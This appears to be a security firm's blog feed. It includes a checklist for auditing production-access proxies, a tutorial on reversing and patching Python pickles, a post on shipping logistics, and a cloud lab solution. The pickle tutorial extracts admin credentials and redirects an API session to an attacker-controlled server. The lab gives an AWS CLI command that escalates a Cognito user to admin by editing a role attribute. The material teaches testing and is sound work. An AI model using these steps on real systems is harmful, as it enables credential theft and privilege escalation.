Testing Zero Touch Production Platforms and Safe Proxies

3 May 2023 at 22:00

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows 1 2. This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?

“Every change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism.” – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google’s DevOps teams and is the golden standard to this day. According to this picture, there are SREs, a selected group of engineers that can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of the production operations while providing routes for manual changes when necessary. This is the basic reasoning behind what was introduced by the “Zero Touch Production” pattern.

The way we all feel about SRE

Safe Proxies In Production

The “Safe Proxy” model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating blast radius of impacted machines, etc.). On paper, it’s a great way to protect production from human errors affecting the availability, but it can also help to prevent some forms of malicious access. A typical scenario involves an SRE that is compromised or malicious and tries to do what an attacker would do with privileges. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important as the attackers will find them valuable and target them.

Generic scheme about Safe Proxies

What does ZTP look like today

Many companies nowadays need these secure proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another. This is because it’s an immature market and no off-the-shelf solutions exist. During the development, the security team is often included in the steering committee but may lack the domain-specific logic to build similar solutions. Another issue is that since usually the main driver is the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions are to this day suffering in their adoption rates and are subjected to lax intepretations (to a point where developers are the ones using these systems to access what they’re allowed to touch in production). These services are particularly juicy for both pentesters and attackers. It’s not an understatement to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any Pagerduty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks.

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In an hypotetical sample attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make the hosts look alive? This can be achieved with ping reply spoofing or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing the access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generating settings that are secure by default. For a full list of the design strategies presented, see the “Building Secure and Reliable Systems” bible 3.

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

Proper rate-limiting configuration is essential to ensure an attacker cannot change all production “at once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

ZTP

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to “living off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when an allowlist is created (abstract syntax tree (AST), regex, binary match, etc.).

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential. Entering it must be loud, justified, alert security, and be heavily logged. As an additional security measure, the breakglass mechanism for zero trust networking should be available only from specific locations. These locations are the organization’s panic rooms, specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

  1. Michał Czapiński and Rainer Wolafka from Google Switzerland, “Zero Touch Prod: Towards Safer and More Secure Production Environments”. USENIX (2019). Link / Talk 

  2. Ward, Rory, and Betsy Beyer. “Beyondcorp: A new approach to enterprise security”, (2014). Link 

  3. Adkins, Heather, et al. ““Building secure and reliable systems: best practices for designing, implementing, and maintaining systems”. O’Reilly Media, (2020). Link 

Reversing Pickles with r2pickledec

31 May 2023 at 22:00

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current). In this post we will go over what Python pickles are, how they work and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes. You will often see memoize instructions. Naively, the memoize instruction will copy the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more about pickles, I recommend playing with some pickles. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case it’s probably fine, I added the pickle arch to r2 a long time ago. But if you run into any bugs I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to only rely on r2 libraries. So if r2 works on your system, r2pickledec should work too. You should be able to instal with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver is intended to allow employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that is used by the server to restore state. What interesting things might we find in the pickle?

The pickle appears below base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu

We decode the pickle and put it in a file, lets call it test.pickle. We then open the file with r2. We also run x to see some hex and pd to print dissassembly. If you ever want to know what an r2 command does, just run the command but append a ? to the end to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly it appears this file is indeed a pickle. We also see requests.sessions and Session as strings. This pickle likely imports requests and uses sessions. Let’s decompile it. We will run the command pdPf @0 ~.... This takes some explaining though, since it uses a couple of r2’s features.

  • pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.

  • @0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now because our current offset defaults to
    1. I just make this a habit in general to prevent mistakes when I am seeking around to patch something.
  • ~.. - This is the r2 version of |less. It uses r2’s built in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is seen below, but snipped. All comments below were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the variable indicates that the decompiler does not know what type of object this is. This is because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix. The decompiler knows this is a global, since it is from an import. It even adds the Api part in to hint at what the import it. The x1c and x616 indicate the offset in the pickle where the object was created. We will use that later to patch the pickle.

Since we used flags, we can easily rename variables by renaming the flag. It might be helpful to rename the g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice, the flag will tab complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c you will see api. If we search for its first use, you will find the below code.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.

In this snippet of code, we see the request session being imported. You may have noticed the baseurl field in the previous snippet of code. Looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for “requests session basic authentication” turns up the auth attribute. Let’s look for “auth” in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short though, the above code sets up the dictionary dict_x51 where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now I don’t recommend doing this on a real pentest, but let’s take things farther. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for “https” and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is being set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5e flag. When seeking to a flag in r2 you can tab complete the flag. Notice the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant by adding a j to the end. In this case, pdPj will produce an AST in JSON. This is complete with offsets. Using this you can write a parser that will automatically find the baseurl element of the returned api object, get the offset and patch it.

JSON can also be helpful without r2pipe. This is because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty print JSON with ~{}, but for this pickle it would produce 1492 lines of JSON. So better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can go use the provided JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcomand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600

Don’t forget you can pipe to external commands. For example, pdPj |jq can be used to search the AST for different patterns. For example, you could return all objects where the type is PY_GLOBAL.

Conclusion

The r2pickledec plugin simplifies reversing of pickles. Because it is a r2 plugin, you get all the features of r2. We barely scratched the surface of what r2 can do. If you’d like to learn more, check out the r2 book. Be sure to keep an eye out for my next post where I will go into Python pickle obfuscation techniques.

Logistics for a Remote Company

5 June 2023 at 22:00

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

Logistics for a Remote Company

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or charged with exorbitant custom fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, Yubikeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we most frequently deal with are laptops, though we also occasionally receive YubiKeys as well. Fortunately, YubiKeys generally do not cause any problems at customs (low market value), and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated custom processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That’s why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of custom fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that custom officers had different approaches even within the same country. This resulted in a range of custom fees, ranging from 0 to 45 euros, for each package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from all the EU and US/Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Messing Around With AWS Batch For Privilege Escalations

12 June 2023 at 22:00

CloudsecTidbit

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "[email protected]"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

  • A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.

  • AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.

  • With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems

  • AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

